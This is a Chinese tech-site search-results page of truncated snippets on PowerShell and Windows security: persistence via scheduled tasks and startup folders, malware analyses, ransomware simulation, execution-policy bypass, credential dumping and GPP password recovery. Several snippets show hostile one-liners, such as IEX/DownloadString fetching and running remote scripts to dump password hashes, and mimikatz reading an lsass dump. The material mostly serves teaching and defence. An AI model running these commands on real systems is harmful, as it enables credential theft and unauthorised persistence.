首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

Windows 命令行快速上手

1.必知点 批处理文件 Windows 脚本文件被被称为批处理文件或命令行脚本,后缀名为 .bat 或 .cmd,在命令提示下键入批处理文件的名称,或者双击该批处理文件,系统就会调用 cmd.exe 按照该文件中各个命令出现的顺序来逐个运行它们...在 PowerShell 中,type 是 Get-Content cmdlet 的内置别名,它也显示文件的内容,但使用不同的语法。...- 用作前缀,意思是“” 示例: :: 删除文件 del FILE rd / rmdir 删除目录。...如果包含 MM-DD-YYYY 值,xcopy 将复制比现有目标文件新的所有源文件。此命令行选项允许您更新已更改的文件。 /e:递归复制子目录及其内容,包括空目录。 /h:复制隐藏和系统文件。.../s:递归复制子目录及其内容。 /v:验证每个新文件的一致性。 /y:不提示确认是否覆盖现有文件。 复制文件。 xcopy file dir 递归复制文件夹及其内容到目标目录,包括空目录。

27720

计划任务的攻防战 | Window 应急响应

这里提供一个 powershell 脚本 # 检索注册表中 Index 值为 0 的计划任务名称及其注册表位置 $taskRegistryPath = "HKLM:\SOFTWARE\Microsoft...不着急直接变成变态,我们先尝试将文件夹中的计划任务test5删除掉 耽误计划任务执行 开始变态,删除掉 testdir 耽误计划任务执行 12....重启计划任务服务计划任务继续执行,耽误 删除 SD 项 这种隐藏的弱点也就是计划任务项没有 SD 项,重启计划任务服务计划任务继续执行,耽误 修改 SD 项 这种隐藏弱点主要在能被 powershell...发现, schtasks 对于这种和不存在的注册表显示有差异,可以枚举,重启计划任务服务计划任务继续执行,耽误 删除文件夹 SD 项 这种隐藏的弱点也就是计划任务文件夹没有 SD 项,重启计划任务服务计划任务继续执行...,耽误 不保留计划任务注册表项 删除注册表中的计划任务 删除注册表中的计划任务文件夹 直接将计划任务注册表搞坏 其实这几种都是一样的,因为计划任务服务会“缓存”计划任务配置,所以修改注册表后,只有在计划任务服务重启后

38710
您找到你想要的搜索结果了吗?
是的
没有找到

恶意软件分析:xHunt活动又使用了新型后门

攻击者使用这两个调度任务作为持久性方法,因为计划任务会反复运行这两个PowerShell脚本,不过运行的时间间隔不同。下图显示的是这两个任务及其相关的创建时间、运行间隔和执行的命令。...TriFive通过登录合法用户的收件箱并从“已删除邮件”文件夹中的电子邮件草稿中获取PowerShell脚本,从而提供了对Exchange服务器的持久化后门访问。...下图显示的一封包含演示命令的邮件,主题为555,邮件内容为woFyeWt3cw==,该脚本将通过PowerShell执行: 为了运行攻击者提供的命令,PowerShell脚本需要登录到Exchange服务器上的合法电子邮件帐户...脚本将打开电子邮件草稿,并使用Base64解码电子邮件消息正文中的内容,然后通过从每个字符中减去10来解密解码命令内容。...然后,脚本会使用PowerShell的内置Invoke Expression(iex)cmdlet来生成明文内容

2.2K10

SQL Server 代理进阶 - Level 2 :作业步骤和子系统

您选择的作业子系统将更改对话框其余部分的内容。对于Transact-SQL作业步骤,提供了一个简单的文本框供您键入Transact-SQL,如我在此处所做的那样。...此数字不包括复制子系统,因为它们是特殊情况,通常这些作业步骤和作业是由复制组件创建的,而不是由DBA创建的。我们将推迟讨论三个分析服务子系统,因为它们有几个独特的考虑因素。...电源外壳 PowerShell子系统允许您运行兼容Windows PowerShell 1.0或2.0的脚本。与其他脚本子系统一样,该脚本将默认在SQL Server代理服务帐户的安全上下文中运行。...PowerShell非常强大,您应该认真研究增长PowerShell的知识。...下次 正如您所看到的,SQL Server Agent作业步骤是作业内容的核心。许多不同的子系统是可用的,每个子系统都有不同的功能。

1.3K40

SharPersist:一款渗透测试中实现Windows系统常驻的套件

背景 PowerShell在过去的几年里在Offensive安全社区被广泛使用。但随着防御性安全行业的推进,正致使攻击性工具包从PowerShell迁移到反射C#以逃避现代安全产品的检测。...其中一些改进包括脚本块记录,反恶意软件脚本接口(AMSI)以及第三方安全供应商针对恶意PowerShell活动签名的开发。...启动文件夹持久性 在此示例中,我们将创建一个名为“Test.lnk”的LNK文件,该文件将放在当前用户的启动文件夹中,并将执行“cmd.exe/c calc.exe”,如下图所示。 ?...同样,你可以使用“-m remove”参数删除启动文件夹持久性,如下图所示。这将从当前用户的启动文件夹中删除LNK文件。 ?...总结 在Offensive安全社区中,使用反射C#协助攻击生命周期的各个阶段是非常必要的,持久性也例外。Windows提供了多种持久性技术,安全专家及其对手将继续发现和利用这些技术。

1.8K00

人人都值得学一点PowerShell实现自动化(2)会使用Excel简单函数就能上手PowerShell

案例1:遍历文件夹示例 虽然说PowerShell是一个要编写代码的方式交互的脚本语言,没有像其他工具那样方便直接界面完成,但脚本语言有其好处是灵活处理,懂使用后,灵活度高出许多。...接下来,把完整的命令,复制到右侧的命令窗格中去查找命令的输入参数,不熟悉的还可以按上文一样查找一下帮助文档及其示例简单学习下。...可以点击运行、插入、复制等按钮,具体对应的情形可以自行测试下,现在选择【复制】按钮,往脚本编辑区粘贴一下。将看到我们已经通过界面生成了以下的代码命令。遍历指定的Path路径,并且递归遍历子文件夹。...最后遍历的所有文件、文件夹清单就出来了,一条命令执行一件事情,PowerShell就是这么简单。...先读取csv,再用管道将读取到的内容供下一步遍历使用,因密码参数需要用密码格式,用了一个ConvertTo-SecureString作转换,最后还是调用New-LocalUser创建用户,整个过程非常简炼

2.9K10

windows系统安全|Windows渗透基础大全

脚本 本地加载并执行PowerShell脚本 远程下载并执行PowerShell脚本 Windows中的批处理文件 Windows中快捷键操作 Windows中运行窗口的命令 Windows中的注册表...中加载并执行PowerShell脚本 Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。...Windows XP 和 Windows Server 2003是没有Powershell的,Win7、2008 Server 及其以后的有。...更多的关于PowerShell的用法:PowerShell使用浅析 本地加载并执行PowerShell脚本 在cmd当前目录下有PowerView.ps1脚本,并执行其中的Get-Netdomain模块...\powerview.ps1;Get-NetDomain 远程下载并执行PowerShell脚本 远程下载并执行test.ps1脚本、远程下载PowerView.ps1脚本,并执行其中的Get-Netdomain

1.7K10

四十二.Powershell恶意代码检测系列 (3)PowerSploit脚本渗透详解

总之,希望该系列文章对博友有所帮助,写文不易,大神们喜勿喷,谢谢!如果文章对您有帮助,将是我创作的最大动力,点赞、评论、私聊均可,一起加油喔!...1.PowerShell简介 Windows PowerShell 是一种命令行外壳程序和脚本环境,它内置在Windows 7版本及其以上的系统中,使命令行用户和脚本编写者可以利用 .NET Framework...命令区分大小写。...追加内容:Add-Content light.txt-Value “i love you” 清除内容:Clear-Content test.txt 举个简单的示例: New-Item test -ItemType...---- 4.PowerShell远程下载文件并执行 该部分内容学习了谢公子老师的总结,当然第二部分我详细介绍了和渗透结合的用法。

2.8K30

PowerShell系列(五):PowerShell通过脚本方式运行笔记

同样的为了实现PowerShell脚本的保存、方面在别的服务器迁移,一般都是先编写脚本,然后通过脚本文件执行完成相应的运维任务。...首先打开 WindowPowerShell ISE 开发环境新建一个test.ps1,脚本内容如下:$arr1=1..10 #定义一个1~10的数组 $arr1  #打印数组一、四种执行方式介绍1、当前文件夹运行命令进入存放脚本文件的命令...\psl1脚本文件我的脚本文件存放在F盘的桌面目录执行命令如下F  #进入F盘cd 桌面 #进入桌面文件夹 ....\test.ps1  #运行命令2、直接指定完整文件路径执行完整psl1脚本文件F:\桌面\test.ps1具体如下图3、通过cmd命令直接执行需要加关键字PowerShell才可以识别是执行的PowerShell...命令格式:PowerShell  ps1脚本文件完整路径4、通过Windows计划任务执行PowerShell脚本PowerShell 脚本默认无法执行,需要先修改 PowerShell 执行策略(ExecutionPolicy

81641

气象编程 | 适用于 Linux 的 Windows 子系统安装指南 (Windows 10)

有关其他常见错误及其解决方法,请参阅 WSL 故障排除页。 安装失败并出现错误 0x80070003 适用于 Linux 的 Windows 子系统只能在系统驱动器(通常是 C: 驱动器)中运行。...取消选中“压缩内容”(如果已选中“加密内容”,请一并取消选中),方法是打开 Linux 发行版的配置文件文件夹。...选择“属性”>“高级”,然后确保未选择(未勾选)“压缩内容以节省磁盘空间”和“加密内容以保护数据”复选框。...无法将词语“wsl”识别为 cmdlet、函数、脚本文件或可运行程序的名称。 请确保已安装“适用于 Linux 的 Windows 子系统”可选组件。...声明:欢迎转载、转发本号原创内容,可留言区留言或者后台联系小编(gavin7675)进行授权。气象学家公众号转载信息旨在传播交流,其内容由作者负责,代表本号观点。

5.6K60

如何使用PSRansom进行勒索软件安全分析

关于PSRansom PSRansom是一款带有C2服务器功能的PowerShell勒索软件模拟工具,该工具可以帮助广大研究人员模拟针对任何操作系统平台(只要安装了PowerShell即可)的通用勒索软件数据加密过程...下载完成之后,我们将拿到两个脚本:PSRansom和C2Server。第一个将模拟勒索软件感染,而第二个将负责恢复文件及其恢复密钥。...工具使用样例 首先,我们的测试场景定义如下: 1、勒索软件将在 Windows 机器上运行 2、我们要加密的文件夹位于 C:\Backup 3、C2 服务器将在 Kali Linux 上运行 4、所有流量都将通过代理查看详细信息...完成后,原始文件将被删除,仅保留加密的文件: 服务器端将接收到类似如下图所示的内容: 现在,我们将在服务器端接收到目标设备的信息、恢复密钥、加密文件列表等: 许可证协议 本项目的开发与发布遵循GPL...参考资料 https://darkbyte.net/psransom-simulando-un-ransomware-generico-con-powershell

50920

Powershell绕过执行及脚本混淆

,比如: fc 在 cmd 中,fc 应该输出对应文件夹的子文件夹信息,而在 powershell 中,fc 的全称是 Format-Custom,一个有关格式化输出的命令。...1、与文件系统交互,运行应用程序 2、创建及运行脚本( .ps1 ) 和其他脚本语言一样,支持将命令列表编写成脚本,但是一个 .ps1 文件默认是以记事本打开,而非 powershell 执行(这和 powershell...多种方式绕过执行策略 1.管道 最常见的 bypass 执行策略,通过管道方式将脚本内容插入到 powershell.exe 的标准输入内,这种方法不会改变配置但要求写入磁盘: Type helloword.ps1...指定版本参数记录参数 指定版本参数,使得攻击者可以降低 powershell 到一个旧版本,新版本如 -version 2.0 是可以记录操作的。...5.PSConsole: 使用 PSConsole 指定 powershell 控制文件 powershell 脚本分析 几个较为常用的执行脚本的语句: 1、本地绕过执行策略执行脚本 PowerShell.exe

2.7K00

获取Windows系统密码凭证总结

Windows 凭证获取 使用powershell脚本 powershell脚本:[1] https://raw.githubusercontent.com/samratashok/nishang/master.../Gather/Get-PassHashes.ps1[2] powershell IEX(new-object net.webclient).downloadstring('脚本地址');Get-PassHashes...在cmd中使用如下命令,将脚本加载到内存中直接执行 powershell IEX (New-Object Net.WebClient).DownloadString('脚本下载地址');Invoke-Mimikatz...,如果不是同一个文件夹,需要在猕猴桃中cd到lsass所在的文件夹中) # 载入静态的lsass文件 sekurlsa::minidump lsass.dmp # 读取所有密码凭证信息(载入文件夹后使用...使用方便 内存加载 Pwddump7 和powershell脚本类似 内存加载 Procdump 微软官方工具 无落地 注册表 系统内置 无落地 LaZagne 功能强大 文件落地 msf 功能强大

55910

浅谈域渗透中的组策略及gpp运用

SYSVOL包括登录脚本,组策略数据,以及其他域控所需要的域数据,这是因为SYSVOL能在所有域控里进行自动同步和共享。...1.通过在域中下发脚本来执行 2.在组策略首选项GPP中进行设置 3.本地管理员密码解决方案:LAPS(细说这个内容,这是解决这个问题很好的方案) 首先我们需要了解下AD域中两个默认的共享文件夹:SYSVOL...目录 SYSVOL目录是AD域中的一个共享文件夹,该文件夹在AD活动目录安装时候被创建。...导入Get-GPPPassword.ps1 powershell Get-GPPPassword 加载该函数 这个powershell脚本会自动遍历SYSVOL下的敏感文件,并且将密码解密 3.针对性用户查找...的OU组 3.查看OU组信息 powershell Get-DomainOU -identity GPPVuln 发现有个GPP的link链接信息,然后我们根据这个GPUD去相应的文件夹进行搜索就可以了

1.4K10

内网渗透 | 浅谈域渗透中的组策略及gpp运用

SYSVOL包括登录脚本,组策略数据,以及其他域控所需要的域数据,这是因为SYSVOL能在所有域控里进行自动同步和共享。...1.通过在域中下发脚本来执行 2.在组策略首选项GPP中进行设置 3.本地管理员密码解决方案:LAPS(细说这个内容,这是解决这个问题很好的方案) 首先我们需要了解下AD域中两个默认的共享文件夹:SYSVOL...目录是AD域中的一个共享文件夹,该文件夹在AD活动目录安装时候被创建。...导入Get-GPPPassword.ps1 powershell Get-GPPPassword 加载该函数 这个powershell脚本会自动遍历SYSVOL下的敏感文件,并且将密码解密 3.针对性用户查找...3.查看OU组信息 powershell Get-DomainOU -identity GPPVuln 发现有个GPO的link链接信息,然后我们根据这个GPUD去相应的文件夹进行搜索就可以了 ?

2.6K20

NSA 攻击工具再遭利用,Windows、Linux服务器沦为挖矿工具

图7 使用特定HTTP 头部值向C&C服务器发送请求 收到的内容被RC4 密码加密过,一般的网络检测设备只能看到内容,但是无法研究或者扫描。只有脚本有密钥。...图9 2层解码过后的混淆脚本 加密货币矿机的DLL注入 该下载的文件,是一个更加模糊的PowerShell 脚本“scv.ps1”,一旦去混淆,整个过程都明了了。...图12“zealot.zip”文件夹内容 “raven64.exe”会扫描内网的445端口,并触发 zealot.py,向win7和win8系统中注入3中不同的shellcode,以利用 EternalSynergy...shellcode,且试图从另一个服务器下载并执行一个名为“minerd_n.ps2”的PowerShell脚本。...被调用的shell将执行一个base64编码的PowerShell脚本,而这个脚本也是通过Apache Struts漏洞传递的。

2.5K50

Git 曝任意代码执行漏洞,所有使用者都受影响

远程代码存储库包含子模块定义和数据,它们作为文件夹捆绑在一起并提交给父代码存储库。 当这个代码仓库被来回复制时,Git 最初会将父仓库放到工作目录中,然后准备复制子模块。...但是,Git 稍后会发现它不需要复制子模块,因为子模块之前已经提交给父存储库,它也被写入工作目录,这个子模块已经存在于磁盘上。...这包括 .git 或配置文件的内容。 另外,在 Git 工作流中的特定位置执行的钩子(如Git)将在将文件写入工作目录时执行 Post-checkout 钩子。...为了解决这个问题,Git 客户端现在将更仔细地检查子文件夹文件夹名称。 包含现在非法的名称,并且它们不能是符号链接,因此这些文件实际上必须存在于 .git 中,而不能位于工作目录中。

53410
领券